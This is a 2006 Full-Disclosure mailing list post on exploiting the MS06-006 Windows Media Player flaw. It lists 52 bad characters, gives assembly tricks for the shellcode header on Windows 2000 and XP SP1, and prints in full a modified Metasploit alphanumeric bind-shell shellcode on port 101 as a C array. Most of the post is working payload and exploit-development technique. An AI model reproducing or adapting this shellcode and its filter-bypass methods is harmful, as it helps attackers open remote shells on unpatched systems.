[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <43F502BA.6040400@heapoverflow.com>
Date: Thu Feb 16 22:54:56 2006
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: MS06-06 Windows Media Player Exploitation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
if you try the shellcode this wont work of course because its made in
another exploitation environment, but at least if you are in the same
case you can try to do via this method, depending of your current
registers and modding the shellcode header to feat with your
vulnerability environment where the metasploit project can't mod this
"locked" header.
hope it helps.
ad@...poverflow.com wrote:
> not sure about what you are looking for but read this below , it's
> from an unpublished poc where I had to trick with 52 badchars:
>
> -
> --------------------------------------------------------------------------------------------
> 52 BADCHARS:
>
> 0x00 0x22 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x70 0x71
> 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0xE0 0xE1 0xE2 0xE3 0xE4
> 0xE5 0xE6 0xE7 0xE8 0xE9 0xEA 0xEB 0xEC 0xED 0xEE 0xEF 0xF0 0xF1
> 0xF2 0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF
>
>
> Due to the high number of bad chars, especially an upper/lower case
> conflict, I have used the msf bind shellcode port 101 with the
> PexAlphaNum encoder.
>
> EB 03 JMP SHORT 0012EE63 59 POP ECX EB 05
> JMP SHORT 0012EE68 E8 F8FFFFFF CALL 0012EE60
>
> But it contains 7 bad chars as you can see, so another way is (for
> 2k):
>
>
> 83C3 1C ADD EBX,1C 53 PUSH EBX 59
> POP ECX
>
> Because ebx+1c is a fixed addr pointing were the alphanum shellcode
> starts, and so on, is popped to ecx correctly, and 0 badchars.
>
> And the one for XP sp1 (because no more direct pointer where I
> need, but I found near the dword of a reg):
>
> 834424 08 1C ADD DWORD PTR SS:[ESP+8],1C 895C24 08 MOV
> EBX,DWORD PTR SS:[ESP+8] 53 PUSH EBX 59
> POP ECX
>
> -
> ------------------------------------------------------------------------------------------------
>
>
> /*modded metasploit bindshellcode port 101*/ char scode1[]=
> "\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59" /*upon this text is the
> modded header for 2k, it changes depending the OS you exploit, read
> my exploit's header or debug for much informations, this is how I
> trick with 52 badchars... thks to msf guys for all the rest, this
> is a great alphanum uppercase shellcode really appreciated here
> :)*/ "\x4f\x49\x49\x49\x49\x49"
> "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
> "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
> "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
> "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
> "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"
> "\x4e\x36\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
> "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
> "\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x48"
> "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
> "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
> "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x42\x45\x47\x45\x4e\x4b\x48"
> "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x54"
> "\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
> "\x49\x58\x4e\x56\x46\x32\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d"
> "\x46\x36\x4b\x48\x43\x44\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x38"
> "\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x44\x4a\x50\x50\x55\x4a\x36"
> "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
> "\x43\x55\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x57"
> "\x44\x53\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
> "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
> "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
> "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35"
> "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x35\x43\x55\x43\x34"
> "\x43\x35\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x42\x30"
> "\x45\x56\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
> "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
> "\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
> "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
> "\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d"
> "\x42\x45\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
> "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
> "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x36\x43\x56"
> "\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x45\x49\x45\x49\x52\x4e\x4c"
> "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c"
> "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x44\x4e\x52"
> "\x43\x49\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
> "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
> "\x48\x4d\x4b\x45\x47\x35\x44\x45\x41\x55\x41\x35\x41\x35\x4c\x46"
> "\x41\x30\x41\x55\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
> "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
> "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
> "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
> "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d"
> "\x4f\x4f\x42\x4d\x5a";
>
>
> c0ntex wrote:
>>> No exploit, just some basic research - anyone with 100% Ascii
>>> win32
> shellcode?
>>> http://open-security.org/winmedia/index.html
>>>
>>> --
>>>
>>> regards c0ntex _______________________________________________
>>> Full-Disclosure - We believe in it. Charter:
>>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted
>>> and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>>
>
>
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
iQIVAwUBQ/UCuq+LRXunxpxfAQKbRhAAg36gK/tnR1g8BZ+IijjF6SbdSlynx9/H
uWDItyVcOmwvW7asCIH9HQ+xxT/P1oeBsCFL+tSGT4GBDiTEsv65j6kJVnMCeCTc
f2v/cO9bm76Nq1SCBwNECcZvpzl0zpZ8ViU/ty1wHJVKtql45xLEJhKTpH6Cb049
OaqQhxIIqlLGZ+MwVjcG8RpK8bJnCOV38NU0tZqzp8POYSXuOaAtrIwI1BD+CECd
Xl+NwOZ4xBF4RZz0xchvH+CxmWwW5K8tDoENc9Qre4LXdSCO9juBBA3KTuPW+uq9
6+5FbiHFcNWHwTU1WvHWTEmUNGAnDwr8sgI648nbFvbhtlbwbXnT4+RoK4gd3cSl
0H91/BEnCCleAwXB6pjw5B15S5Z13ffVZTaPkVEsp21t59TC7mPpKuJ4L5GRR0Ku
bkLD7MWzypyp8LBLtT0HiVAKyNviqJD8t5utXz62UHZdpYrumZFTpzwwQ9ntslxw
qDAVYS5bHgF31p4TjkNog+4GsA8QnZ831qn7vTGAlPjSacocu5hi3nJEDb8PcndP
BcT7awGKO9RlvPfDOkiwEnZdW6pIzIeDmHb9Qc/DI80UwfPtw8+4xG0rgEG5mLpz
DxAyiPdOTf36K7wIWKmin4lU5/AyAlU1QhXziMlj+xuot/0TPjDGOJkVDCXIUneY
8S5UI5tiDww=
=tYT1
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists